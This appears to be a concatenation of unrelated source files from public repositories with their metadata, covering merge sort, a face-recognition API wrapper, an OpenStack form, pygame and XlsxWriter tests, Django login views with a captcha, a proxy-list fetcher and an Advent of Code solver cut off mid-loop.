PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lrotate_recovery".split(';') if "-lrotate_recovery" != "" else []
PROJECT_NAME = "rotate_recovery"
PROJECT_SPACE_DIR = "/home/alfred/quan_ws/devel"
PROJECT_VERSION = "1.13.0"
|
[
"quanzhou64@gmail.com"
] |
quanzhou64@gmail.com
|
a501a4ab05f3d9e89675e2356cd1b41b8b15c30b
|
a995f917e307be0d427cc9cfd3dbdd045abdd097
|
/算法基础课/1.基础算法/AcWing 787. 归并排序.py
|
e744c5c260576841526218d12f96711f9577710f
|
[] |
no_license
|
Andrewlearning/Leetcoding
|
80d304e201588efa3ac93626021601f893bbf934
|
819fbc523f3b33742333b6b39b72337a24a26f7a
|
refs/heads/master
| 2023-04-02T09:50:30.501811
| 2023-03-18T09:27:24
| 2023-03-18T09:27:24
| 243,919,298
| 1
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,080
|
py
|
def merge_sort(arr, l, r, temp):
if l >= r:
return
# 1.选取中点
mid = (l + r) // 2
# 2.递归排序
merge_sort(arr, l, mid, temp)
merge_sort(arr, mid + 1, r, temp)
# 3.归并操作,原数组的左右两半指针
i = l
j = mid + 1
# temp数组的指针
k = 0
while (i <= mid and j <= r):
if arr[i] <= arr[j]:
temp[k] = arr[i]
i += 1
else:
temp[k] = arr[j]
j += 1
k += 1
while i <= mid:
temp[k] = arr[i]
i += 1
k += 1
while j <= r:
temp[k] = arr[j]
j += 1
k += 1
# temp记录排序好的数组
# 然后更新到原数组上
i, j = l, 0
while i <= r:
arr[i] = temp[j]
i += 1
j += 1
if __name__ == '__main__':
n = int(input())
lst = list(map(int, input().split()))
temp = [0] * n
merge_sort(lst, 0, len(lst) - 1, temp)
print(' '.join(map(str, lst)))
# 链接:https://www.acwing.com/activity/content/code/content/111492/
|
[
"yifu3@ualberta.ca"
] |
yifu3@ualberta.ca
|
972744e8cd7d968799613fd102bb9eb9d912e243
|
33195bfc9e62bb00ce54f050febb6a3a0929a34b
|
/ms_face_api/src/ms_face_api/face.py
|
f4e45a229df977cece372f41acae8dfe64ccfceb
|
[
"MIT"
] |
permissive
|
LCAS/ros_web_apis
|
8f48e08b52433d6d97173cac1debd45a41681110
|
4b42bcc3c970769e8c814525e566ae37b506f415
|
refs/heads/master
| 2021-10-24T20:33:27.444877
| 2019-03-28T15:54:42
| 2019-03-28T15:54:42
| 82,785,629
| 0
| 4
|
MIT
| 2019-03-28T15:54:43
| 2017-02-22T09:25:33
|
Python
|
UTF-8
|
Python
| false
| false
| 6,400
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
File: face.py
Description: Face section of the Cognitive Face API.
"""
from . import util
def detect(image, face_id=True, landmarks=False, attributes=''):
"""Detect human faces in an image and returns face locations, and
optionally with `face_id`s, landmarks, and attributes.
Args:
image: A URL or a file path or a file-like object represents an image.
face_id: Optional parameter. Return `face_id`s of the detected faces or
not. The default value is `True`.
landmarks: Optional parameter. Return face landmarks of the detected
faces or not. The default value is `False`.
attributes: Optional parameter. Analyze and return the one or more
specified face attributes in the comma-separated string like
`age,gender`. Supported face attributes include age, gender,
headPose, smile, facialHair, and glasses. Note that each face
attribute analysis has additional computational and time cost.
Returns:
An array of face entries ranked by face rectangle size in descending
order. An empty response indicates no faces detected. A face entry may
contain the corresponding values depending on input parameters.
"""
url = 'detect'
headers, data, json = util.parse_image(image)
params = {
'returnFaceId': face_id and 'true' or 'false',
'returnFaceLandmarks': landmarks and 'true' or 'false',
'returnFaceAttributes': attributes,
}
return util.request('POST', url, headers=headers, params=params, json=json,
data=data)
def find_similars(face_id, face_list_id=None, face_ids=None,
max_candidates_return=20, mode='matchPerson'):
"""Given query face's `face_id`, to search the similar-looking faces from a
`face_id` array or a `face_list_id`.
Parameter `face_list_id` and `face_ids` should not be provided at the same
time.
Args:
face_id: `face_id` of the query face. User needs to call `face.detect`
first to get a valid `face_id`. Note that this `face_id` is not
persisted and will expire in 24 hours after the detection call.
face_list_id: An existing user-specified unique candidate face list,
created in `face_list.create`. Face list contains a set of
`persisted_face_ids` which are persisted and will never expire.
face_ids: An array of candidate `face_id`s. All of them are created by
`face.detect` and the `face_id`s will expire in 24 hours after the
detection call. The number of `face_id`s is limited to 1000.
max_candidates_return: Optional parameter. The number of top similar
faces returned. The valid range is [1, 1000]. It defaults to 20.
mode: Optional parameter. Similar face searching mode. It can be
"matchPerson" or "matchFace". It defaults to "matchPerson".
Returns:
An array of the most similar faces represented in `face_id` if the
input parameter is `face_ids` or `persisted_face_id` if the input
parameter is `face_list_id`.
"""
url = 'findsimilars'
json = {
'faceId': face_id,
'faceListId': face_list_id,
'faceIds': face_ids,
'maxNumOfCandidatesReturned': max_candidates_return,
'mode': mode,
}
return util.request('POST', url, json=json)
def group(face_ids):
"""Divide candidate faces into groups based on face similarity.
Args:
face_ids: An array of candidate `face_id`s created by `face.detect`.
The maximum is 1000 faces.
Returns:
one or more groups of similar faces (ranked by group size) and a
messyGroup.
"""
url = 'group'
json = {
'faceIds': face_ids,
}
return util.request('POST', url, json=json)
def identify(face_ids, person_group_id, max_candidates_return=1,
threshold=None):
"""Identify unknown faces from a person group.
Args:
face_ids: An array of query `face_id`s, created by the `face.detect`.
Each of the faces are identified independently. The valid number of
`face_ids` is between [1, 10].
person_group_id: `person_group_id` of the target person group, created
by `person_group.create`.
max_candidates_return: Optional parameter. The range of
`max_candidates_return` is between 1 and 5 (default is 1).
threshold: Optional parameter. Confidence threshold of identification,
used to judge whether one face belongs to one person. The range of
confidence threshold is [0, 1] (default specified by algorithm).
Returns:
The identified candidate person(s) for each query face(s).
"""
url = 'identify'
json = {
'personGroupId': person_group_id,
'faceIds': face_ids,
'maxNumOfCandidatesReturned': max_candidates_return,
'confidenceThreshold': threshold,
}
return util.request('POST', url, json=json)
def verify(face_id, another_face_id=None, person_group_id=None,
person_id=None):
"""Verify whether two faces belong to a same person or whether one face
belongs to a person.
For face to face verification, only `face_id` and `another_face_id` is
necessary. For face to person verification, only `face_id`,
`person_group_id` and `person_id` is needed.
Args:
face_id: `face_id` of one face, comes from `face.detect`.
another_face_id: `face_id` of another face, comes from `face.detect`.
person_group_id: Using existing `person_group_id` and `person_id` for
fast loading a specified person. `person_group_id` is created in
`person_group.create`.
person_id: Specify a certain person in a person group. `person_id` is
created in `person.create`.
Returns:
The verification result.
"""
url = 'verify'
json = {}
if another_face_id:
json.update({
'faceId1': face_id,
'faceId2': another_face_id,
})
else:
json.update({
'faceId': face_id,
'personGroupId': person_group_id,
'personId': person_id,
})
return util.request('POST', url, json=json)
|
[
"marc@hanheide.net"
] |
marc@hanheide.net
|
d8d1812873a44c27109fa4743dfcfd87d8b54ca3
|
d2f63dd0bb5bd8fa7e9ae4ca828cbfe710390f33
|
/horizon/horizon/dashboards/nova/images_and_snapshots/snapshots/forms.py
|
aad9e6b93451418dbc9496b6625eebdf3778f553
|
[
"Apache-2.0"
] |
permissive
|
citrix-openstack/horizon
|
4df36bec738a212cbb320b8ac4caf624a883815e
|
7987e68f135895728f891c2377b589f701d8106e
|
HEAD
| 2016-09-11T11:30:42.348228
| 2012-01-24T01:46:06
| 2012-01-24T01:46:06
| 2,492,995
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,224
|
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django import shortcuts
from django.contrib import messages
from django.utils.translation import ugettext as _
from openstackx.api import exceptions as api_exceptions
from horizon import api
from horizon import forms
LOG = logging.getLogger(__name__)
class CreateSnapshot(forms.SelfHandlingForm):
tenant_id = forms.CharField(widget=forms.HiddenInput())
instance_id = forms.CharField(widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
name = forms.CharField(max_length="20", label=_("Snapshot Name"))
def handle(self, request, data):
try:
LOG.info('Creating snapshot "%s"' % data['name'])
snapshot = api.snapshot_create(request,
data['instance_id'],
data['name'])
instance = api.server_get(request, data['instance_id'])
messages.info(request,
_('Snapshot "%(name)s" created for instance "%(inst)s"') %
{"name": data['name'], "inst": instance.name})
return shortcuts.redirect('horizon:nova:images_and_snapshots:'
'index')
except api_exceptions.ApiException, e:
msg = _('Error Creating Snapshot: %s') % e.message
LOG.exception(msg)
messages.error(request, msg)
return shortcuts.redirect(request.build_absolute_uri())
|
[
"gabriel@strikeawe.com"
] |
gabriel@strikeawe.com
|
1190c16c78aea4a60bd6c95b91fa8737499b53b0
|
95d32a98d0715816fd763c6df356069d91d74f33
|
/021.py
|
83ecc3eddb072db50e4b272f4ea5ba096ba4d2c3
|
[] |
no_license
|
jod35/coding-challenges
|
1f65d08d92c143004f44eafd4922ec0dcb652a1f
|
21cfa2853dac70055d2b20155e03dff1c235ee02
|
refs/heads/master
| 2022-12-14T22:31:37.344450
| 2020-09-18T19:47:51
| 2020-09-18T19:47:51
| 291,939,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 153
|
py
|
firstname=input("Enter your first name: ")
surname=input("Enter your surname: ")
print(f"{firstname} {surname} is of length {len(firstname+surname)}")
|
[
"jodestrevin@gmail.com"
] |
jodestrevin@gmail.com
|
3ed7586381e1664293709ab9dac14351df1831e7
|
6999630ddf8559c9c6bee40a1dfa4a53d2ce4867
|
/get_proxy_from_XMX.py
|
5b1e4d26017e8ab210b7b69b68e4d87cb4dd843d
|
[] |
no_license
|
possager/YFZX_new
|
a6a21cd7a8d6731af5ce87aae9887408472d295a
|
057925659a7fcae4179d68cf2e0fca576e1de9f2
|
refs/heads/master
| 2021-01-02T22:33:00.488949
| 2017-11-27T00:49:47
| 2017-11-27T00:49:47
| 99,334,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,029
|
py
|
#_*_coding:utf-8_*_
#因为reids在idc上挂了,所以写了这么一个新的代理
import requests
import json
import time
from saveresult import BASIC_FILE
import random
import datetime
class Proxy:
# def __init__(self,url_proxy='http://172.16.2.11:8899'):
def __init__(self,url_proxy='http://172.16.1.4:8899/'):
self.url_proxy=url_proxy
def save_proxy(self):
response=requests.get(self.url_proxy)
jsondata=json.loads(response.text)
file1=BASIC_FILE+'/proxy.txt'
with open(file1,'w') as fl:
json.dump(jsondata,fl,encoding='utf-8')
# json.dump(jsondata,file1)
def get_proxy_couple(self,num):
file1 = BASIC_FILE + '/proxy.txt'
with open(file1,'r') as fl:
datajson=json.load(fl,encoding='utf-8')
if datajson:
# return (str(datajson[num]['ip']),str(datajson[num]['port']))
return str(datajson[num]['ip'])+':'+str(datajson[num]['port'])
# url_proxy='http://192.168.8.52:8899/'
url_proxy='http://172.16.1.4:8899/'#yuancheng
def save_proxy():
while True:
try:
response = requests.get(url_proxy)
jsondata = json.loads(response.text)
file1 = BASIC_FILE + '/proxy.txt'
with open(file1, 'w') as fl:
json.dump(jsondata, fl, encoding='utf-8')
print datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
time.sleep(30)
except Exception as e:
pass
def get_proxy_couple(num):
file1 = BASIC_FILE + '/proxy.txt'
with open(file1,'r') as fl:
datajson=json.load(fl,encoding='utf-8')
if datajson:
# return (str(datajson[num]['ip']),str(datajson[num]['port']))
num=random.randint(0,len(datajson)-1)
return str(datajson[num]['ip'])+':'+str(datajson[num]['port'])
if __name__ == '__main__':
# thisclass=Proxy()
# # thisclass.save_proxy()
# print thisclass.get_proxy_couple(2)
# print get_proxy_couple(2)
save_proxy()
|
[
"passager@163.com"
] |
passager@163.com
|
9f653ab13307676c72916817ec6736cef0226239
|
d41d18d3ea6edd2ec478b500386375a8693f1392
|
/plotly/validators/carpet/aaxis/_tickvals.py
|
d662833232a93d94748922377e31518cbba4b730
|
[
"MIT"
] |
permissive
|
miladrux/plotly.py
|
38921dd6618650d03be9891d6078e771ffccc99a
|
dbb79e43e2cc6c5762251537d24bad1dab930fff
|
refs/heads/master
| 2020-03-27T01:46:57.497871
| 2018-08-20T22:37:38
| 2018-08-20T22:37:38
| 145,742,203
| 1
| 0
|
MIT
| 2018-08-22T17:37:07
| 2018-08-22T17:37:07
| null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
import _plotly_utils.basevalidators
class TickvalsValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(
self, plotly_name='tickvals', parent_name='carpet.aaxis', **kwargs
):
super(TickvalsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='data',
**kwargs
)
|
[
"adam.kulidjian@gmail.com"
] |
adam.kulidjian@gmail.com
|
654f906f59ef8bb22afe907524e10160829658d8
|
1f006f0c7871fcde10986c4f5cec916f545afc9f
|
/apps/ice/plugins/required/plugin_info.py
|
efab21549b3cbef46e32e6e38adbc4c8701eb49f
|
[] |
no_license
|
ptsefton/integrated-content-environment
|
248b8cd29b29e8989ec1a154dd373814742a38c1
|
c1d6b5a1bea3df4dde10cb582fb0da361dd747bc
|
refs/heads/master
| 2021-01-10T04:46:09.319989
| 2011-05-05T01:42:52
| 2011-05-05T01:42:52
| 36,273,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,006
|
py
|
#
# Copyright (C) 2007 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
import pysvn
import sys
pluginName = "ice.info"
pluginDesc = ""
pluginFunc = None # either (or both) pluginFunc or pluginClass should
pluginClass = None # be set by the pluginInit() method
pluginInitialized = False # set to True by pluginInit() method
def pluginInit(iceContext, **kwargs):
global pluginFunc, pluginClass, pluginInitialized
pluginFunc = None
pluginClass = VersionInfo
pluginInitialized = True
return pluginFunc
class VersionInfo:
def __init__(self, iceContext=None, *args):
self.iceContext = iceContext
def svn(self):
return str(pysvn.svn_version)
def pysvn(self):
return str(pysvn.version)
def python(self):
return str(os.sys.version)
def iceTrunkRevision(self):
svn = pysvn.Client()
return str(svn.info('../../../trunk').revision)
def __getArgs(self):
return self.__args
def summary(self):
info = VersionInfo()
summary = "Built from ICE trunk " + info.iceTrunkRevision() + "\n"
summary = summary + "SVN version " + info.svn() + "\n"
summary = summary + "pysvn version " + info.pysvn() + "\n"
summary = summary + "Python: " + info.python()
return summary
def getSummary(self):
argv = sys.argv
info = VersionInfo()
try:
result = "ICE version: " + argv[1] + "\n"
result = result + info.summary()
return str(result)
except:
try:
f = open('version_info.txt', 'r')
info = f.read()
f.close()
return info
except IOError:
summary = "ICE version: unversioned \n"
summary = summary + "SVN version " + info.svn() + "\n"
summary = summary + "pysvn version " + info.pysvn() + "\n"
summary = summary + "Python: " + info.python()
return summary
def main(argv=None):
if argv is None:
argv = sys.argv
info = VersionInfo()
print "%s" % info.getSummary()
if __name__ == "__main__":
sys.exit(main())
|
[
"raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] |
raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05
|
20a5389145ea522daccca65f7fb7d8b787f1b09e
|
978248bf0f275ae688f194593aa32c267832b2b6
|
/xlsxwriter/test/comparison/test_set_start_page01.py
|
11f627dcef39de7dc1ca840d9031d251ff300970
|
[
"BSD-2-Clause-Views"
] |
permissive
|
satish1337/XlsxWriter
|
b0c216b91be1b74d6cac017a152023aa1d581de2
|
0ab9bdded4f750246c41a439f6a6cecaf9179030
|
refs/heads/master
| 2021-01-22T02:35:13.158752
| 2015-03-31T20:32:28
| 2015-03-31T20:32:28
| 33,300,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'set_start_page01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {'xl/worksheets/sheet1.xml': ['<pageMargins']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with printer settings."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.set_start_page(1)
worksheet.set_paper(9)
worksheet.vertical_dpi = 200
worksheet.write('A1', 'Foo')
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
034ebb7456f82467d4f6eac71983f9f9b364a2db
|
306045a1cd0fb362f46d4db88311f442311bbc16
|
/examples/idioms/programs/002.0011-print-hello-10-times.py
|
3793da0117c8784ebd602f2ed2ba9a02168556cd
|
[
"MIT"
] |
permissive
|
laowantong/paroxython
|
608c9010a2b57c8f7ed5ea309e24035c2b2e44a3
|
a6d45829dd34f046d20e5bae780fbf7af59429cb
|
refs/heads/master
| 2023-09-01T05:18:29.687916
| 2022-11-07T17:40:31
| 2022-11-07T17:40:31
| 220,820,424
| 36
| 5
|
MIT
| 2023-09-08T04:44:58
| 2019-11-10T16:54:56
|
Python
|
UTF-8
|
Python
| false
| false
| 307
|
py
|
"""Print Hello 10 times.
Loop to execute some code a constant number of times
Source: programming-idioms.org
"""
# Implementation author:
# Created on 2015-11-30T12:37:23.746597Z
# Last modified on 2019-09-27T02:17:54.987284Z
# Version 2
# Indention is mandatory
for i in range(10):
print("Hello")
|
[
"laowantong@users.noreply.github.com"
] |
laowantong@users.noreply.github.com
|
8dfe4354130dd664527f1ddd3ce0a81ac5a51536
|
3c9103046db53185cfedc1598933a790718e4d57
|
/pygame_assets/tests/test_loaders.py
|
e8d9dde92a8a2bda26361859538fcfebf686ce40
|
[
"MIT"
] |
permissive
|
florimondmanca/pygame-assets
|
9aabe7e482e72c37a95f9283f6b67e47acadf941
|
1ad7870800866d2b1b287d8063bd10edd99fd521
|
refs/heads/master
| 2021-08-19T12:46:04.149161
| 2017-11-25T12:14:06
| 2017-11-25T12:14:06
| 110,216,972
| 3
| 0
| null | 2017-11-11T12:28:38
| 2017-11-10T07:31:56
|
Python
|
UTF-8
|
Python
| false
| false
| 5,844
|
py
|
"""Tests for the loaders API."""
import unittest
import pygame
from pygame_assets.loaders import image as load_image
from pygame_assets.loaders import image_with_rect as load_image_with_rect
from pygame_assets.loaders import sound as load_sound
from pygame_assets.loaders import music as load_music
from pygame_assets.loaders import font as load_font
from pygame_assets.loaders import freetype as load_freetype
from pygame_assets.configure import get_config
from .utils import TestCase, change_config
class LoaderTestCase(TestCase):
"""Test case suited for loader unit testing.
Class attributes
----------------
loader : function
A loader as defined by pygame_assets.
filename : str
If defined, the .asset() shortcut will be available to get the
corresponding asset.
"""
filename = None
loader = None
@classmethod
def asset(cls, *args, **kwargs):
if cls.filename is None:
raise ValueError('Could not get asset: no filename defined.')
return cls.loader(cls.filename, *args, **kwargs)
class TestImageLoader(LoaderTestCase):
"""Unit tests for the image loader."""
loader = load_image
filename = 'test-image.png'
@classmethod
def setUpClass(cls):
pygame.init()
# pygame requires to set_mode before loading images
# the same constraint applies to pygame_assets
cls.screen = pygame.display.set_mode((800, 600))
def test_load_image_from_path(self):
self.assertIsInstance(self.asset(), pygame.Surface)
def test_image_with_alpha_keeps_alpha(self):
image = load_image('test-image-with-alpha.png')
self.assertIsNotNone(image.get_alpha())
def test_image_without_alpha_has_no_alpha(self):
image = load_image('test-image-without-alpha.jpg')
self.assertIsNone(image.get_alpha())
def test_force_convert_alpha(self):
self.asset(convert_alpha=True)
self.asset(convert_alpha=False)
def test_alpha_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(True)
class TestImageWithRectLoader(LoaderTestCase):
"""Unit tests for the image_with_rect loader."""
loader = load_image_with_rect
filename = 'test-image.png'
@classmethod
def setUpClass(cls):
pygame.init()
# pygame requires to set_mode before loading images
# the same constraint applies to pygame_assets
cls.screen = pygame.display.set_mode((800, 600))
def test_load_image_with_rect(self):
image, rect = self.asset()
self.assertIsInstance(image, pygame.Surface)
self.assertIsInstance(rect, pygame.Rect)
class TestSoundLoader(LoaderTestCase):
"""Unit tests for the sound loader."""
loader = load_sound
filename = 'test-sound.wav'
@classmethod
def setUpClass(cls):
pygame.mixer.init()
def test_load_sound_from_path(self):
self.assertIsInstance(self.asset(), pygame.mixer.Sound)
def test_set_volume_when_loading(self):
sound = self.asset(volume=0.5)
self.assertEqual(sound.get_volume(), 0.5)
def test_volume_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(0.5)
class TestMusicLoader(LoaderTestCase):
"""Unit tests for the music loader."""
loader = load_music
filename = 'test-sound.wav'
@classmethod
def setUpClass(cls):
pygame.mixer.init()
def test_dir_is_sound(self):
self.assertListEqual(get_config().dirs['music'], ['sound'])
def test_load_music_from_path(self):
self.assertFalse(pygame.mixer.music.get_busy())
returned_value = self.asset()
self.assertIsNone(returned_value)
# music did not start playing
self.assertFalse(pygame.mixer.music.get_busy())
def test_set_volume_when_loading(self):
self.asset(volume=0.5)
self.assertEqual(pygame.mixer.music.get_volume(), 0.5)
def test_volume_is_kwarg_only(self):
with self.assertRaises(TypeError):
self.asset(0.5)
class TestFontLoader(LoaderTestCase):
"""Unit tests for the font loader."""
filename = 'bebas-neue.otf'
loader = load_font
@classmethod
def setUpClass(cls):
pygame.font.init()
def test_load_font_from_path(self):
self.assertIsInstance(self.asset(), pygame.font.Font)
def test_load_with_size(self):
self.assertAlmostEqual(self.asset(size=40).get_height(), 40, delta=10)
def test_default_size_is_20(self):
self.assertEqual(get_config().default_font_size, 20)
self.assertAlmostEqual(self.asset().get_height(), 20, delta=10)
def test_default_change_default_size(self):
with change_config('default_font_size') as config:
config.default_font_size = 60
self.assertAlmostEqual(self.asset().get_height(), 60, delta=15)
class TestFreetypeFontLoader(LoaderTestCase):
"""Unit tests for the freetype font loader."""
filename = 'bebas-neue.otf'
loader = load_freetype
@classmethod
def setUpClass(cls):
pygame.font.init()
def test_dir_is_font(self):
self.assertListEqual(get_config().dirs['freetype'], ['font'])
def test_load_font_from_path(self):
self.assertIsInstance(self.asset(), pygame.freetype.Font)
def test_load_with_size(self):
self.assertEqual(self.asset(size=40).size, 40)
def test_default_size_is_20(self):
self.assertEqual(get_config().default_font_size, 20)
self.assertEqual(self.asset().size, 20)
def test_change_default_size(self):
with change_config('default_font_size') as config:
config.default_font_size = 60
self.assertEqual(self.asset().size, 60)
if __name__ == '__main__':
unittest.main()
|
[
"florimond.manca@gmail.com"
] |
florimond.manca@gmail.com
|
18c381de7282cb9e143b3c630f47752bc1dca908
|
894b8a99a3e05dda63ff156d9a2f3ce81f25c3ba
|
/imix/data/reader/textvqa_reader.py
|
984acecbce85bfcc240b0181dd9e58d455efa3cc
|
[
"Apache-2.0"
] |
permissive
|
jjInsper/iMIX
|
e5e46c580e2925fb94a2571c25777ce504ffab14
|
99898de97ef8b45462ca1d6bf2542e423a73d769
|
refs/heads/master
| 2023-08-08T01:24:47.161948
| 2021-09-16T09:35:35
| 2021-09-16T09:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,379
|
py
|
from ..utils.stream import ItemFeature
from .base_reader import IMIXDataReader
from imix.utils.common_function import update_d1_with_d2
class TextVQAReader(IMIXDataReader):
def __init__(self, cfg):
super().__init__(cfg)
# assert self.default_feature, ('Not support non-default features now.')
def __len__(self):
return len(self.mix_annotations)
def __getitem__(self, idx):
annotation = self.mix_annotations[idx]
feature = self.feature_obj[idx]
global_feature, ocr_feature = {}, {}
item_feature = ItemFeature(annotation)
item_feature.error = False
item_feature.tokens = annotation['question_tokens']
item_feature.img_id = annotation['image_id']
update_d1_with_d2(d1=item_feature, d2=feature)
if self.global_feature_obj:
global_feature = self.global_feature_obj[idx]
global_feature.update({'features_global': global_feature.pop('features')})
update_d1_with_d2(d1=item_feature, d2=global_feature)
if self.ocr_feature_obj:
ocr_feature = self.ocr_feature_obj[idx]
ocr_feature.update({'features_ocr': ocr_feature.pop('features')})
update_d1_with_d2(d1=item_feature, d2=ocr_feature)
item_feature.error = None in [feature, global_feature, ocr_feature]
return item_feature
|
[
"hsslab.inspur@gmail.com"
] |
hsslab.inspur@gmail.com
|
08d782838db68810147ca27d62dcd4ca28c26ec9
|
e81d274d6a1bcabbe7771612edd43b42c0d48197
|
/Django/day76(中间件)/demo/webapp/user/views.py
|
45a2bf2c3f84afbb53964e886aeb9bd72f7aabe7
|
[
"MIT"
] |
permissive
|
ChWeiking/PythonTutorial
|
1259dc04c843382f2323d69f6678b9431d0b56fd
|
1aa4b81cf26fba2fa2570dd8e1228fef4fd6ee61
|
refs/heads/master
| 2020-05-15T00:50:10.583105
| 2016-07-30T16:03:45
| 2016-07-30T16:03:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,800
|
py
|
from django.shortcuts import render,redirect
from user.models import *
from hashlib import *
from django.http import *
from django.template import loader,RequestContext
from django.core.urlresolvers import reverse
from datetime import timedelta
from django.views.decorators.csrf import csrf_exempt
from PIL import Image, ImageDraw, ImageFont, ImageFilter
from io import StringIO,BytesIO
import random
# Create your views here.
def register(request):
return render(request, 'user/register.html')
def register_handler(request):
user = User()
user.uname = request.POST.get('username')
user.upwd = sha1(request.POST.get('userpwd').encode('utf-8')).hexdigest()
user.save()
return render(request, 'user/success.html')
def login(request):
print('session:%s'%request.session.get('currentUser'))
context = {}
#获取cookie
username = request.COOKIES.get('mycooki')
if username:
context['username']=username
return render(request, 'user/login.html',context)
#@csrf_exempt
def login_handler(request):
# 定义上下文
context = {}
#获取验证码
userverification = request.POST.get('userverification')
if userverification==None or request.session['codes'].upper() != userverification.upper():
context = {'userverification_error':'验证码输入错误'}
return render(request,'user/login.html',context)
#用户名密码
username = request.POST.get('username')
userpwd = sha1(request.POST.get('userpwd').encode('utf-8')).hexdigest()
#匹配
ret = User.objects.filter(uname=username,upwd=userpwd)
if len(ret)==0:
return HttpResponseRedirect('/user/login')
else:
#在服务端保持一个session键值对
request.session['currentUser'] = username
request.session.set_expiry(36000)
#request.session.set_expiry(timedelta(days=2))
#加载模板
t1 = loader.get_template('user/success.html')
#上下文
requestcontext = RequestContext(request,context)
#创建具有模板和上下文的reponse
response = HttpResponse(t1.render(requestcontext))
#记录用户名密码的变量
rememberName = request.POST.get('rememberName')
#判断
if rememberName=='1':
#写cookie
response.set_cookie('mycookie',username,max_age=3600)
return response
def verification(request):
# 240 x 60:
width = 60 * 4
height = 60
image = Image.new('RGB', (width, height), (255, 255, 255))
# 创建Font对象:
font = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-BoldItalic.ttf', 36)
# 创建Draw对象:
draw = ImageDraw.Draw(image)
# 填充每个像素:
for x in range(width):
for y in range(height):
draw.point((x, y), fill=rndColor())
#储存验证码字符串
codes = ''
# 输出文字:
for t in range(4):
code = rndChar()
codes += code
draw.text((60 * t + 10, 10),code , font=font, fill=rndColor2())
# 模糊:
image = image.filter(ImageFilter.BLUR)
#将验证码字符串存储到session中
request.session['codes'] = codes
request.session.set_expiry(0)
#内存级的字节读写
f = BytesIO()
image.save(f,'jpeg')
return HttpResponse(f.getvalue(),'image/jpeg')
def test1(request):
#模拟异常
num = 1/0
return render(request, 'user/test1.html')
# 随机字母:
def rndChar():
return chr(random.randint(65, 90))
# 随机颜色1:
def rndColor():
return (random.randint(64, 255), random.randint(64, 255), random.randint(64, 255))
# 随机颜色2:
def rndColor2():
return (random.randint(32, 127), random.randint(32, 127), random.randint(32, 127))
|
[
"1025212779@qq.com"
] |
1025212779@qq.com
|
afb62f95eaaa4ce1aada8b5967d560921f144a77
|
6d2e4655ce0a9012aea88c83e2f49572e6d06738
|
/day-04/day-04-passport-processing-01.py
|
e90db8ced1bc732920d3e2c46bd83a708a9de7e0
|
[] |
no_license
|
LilySu/Advent_of_Code_2020
|
d7664b2e4469e5b0434db94d2452cdf62bc05daa
|
521da7b20b3e47d49a6180e2a2aad78b4d923efa
|
refs/heads/main
| 2023-02-05T00:51:56.363196
| 2020-12-26T03:43:30
| 2020-12-26T03:43:30
| 321,393,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
import re
from typing import List
from run_for_all_input_and_timer import Manager, timer
setup = Manager()
input = setup.get_file()
@timer
def solve(input: List[str]) -> int:
counter = 0
passports = []
txt_block = []
req = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']
reqc = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid', 'cid']
for line in input:
if line != '':
if ' ' in line:
line = line.split(' ')
for i in line:
txt_block.append(i)
else:
txt_block.append(line)
else:
passports.append(txt_block)
txt_block = []
for idx, txt_block in enumerate(passports):
